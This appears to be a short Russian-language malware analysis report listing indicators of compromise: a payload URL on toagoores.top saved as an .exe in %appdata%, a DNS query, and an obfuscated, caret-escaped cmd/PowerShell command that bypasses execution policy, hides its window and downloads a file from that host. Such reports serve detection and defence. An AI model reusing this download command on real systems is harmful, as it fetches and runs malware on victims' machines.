Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWE^rSHEll^.eX^E -EXec^Ution^pOLiC^y BypaS^s -NoPr^o^f^Il^e ^-^wIN^d^OwS^TyL^E hIDD^EN^ ^(NeW-^O^bJe^ct s^ySTeM.nET.WebcL^iENt).dOWnLoAd^FIle^('http://toagoores.top/read.php?f=0.da...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "poWE^rSHEll^.eX^E -EXec^Ution^pOLiC^y BypaS^s -NoPr^o^f^Il^e ^-^wIN^d^OwS^TyL^E hIDD^EN^ ^(NeW-^O^bJe^ct s^ySTeM.nET.WebcL^iENt).dOWnLoAd^FIle^('http://toagoores.top/read.php?f=0.da...' (со скрытым окном)